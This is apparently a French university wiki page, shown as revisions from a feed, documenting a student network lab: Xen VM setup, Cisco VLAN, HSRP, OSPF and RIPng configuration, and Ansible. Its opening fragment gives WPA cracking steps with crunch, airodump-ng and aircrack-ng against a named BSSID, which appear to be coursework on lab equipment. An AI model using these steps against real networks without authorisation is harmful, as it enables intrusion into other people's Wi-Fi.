[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52010</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52010"/>
				<updated>2020-01-05T15:07:17Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Management */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
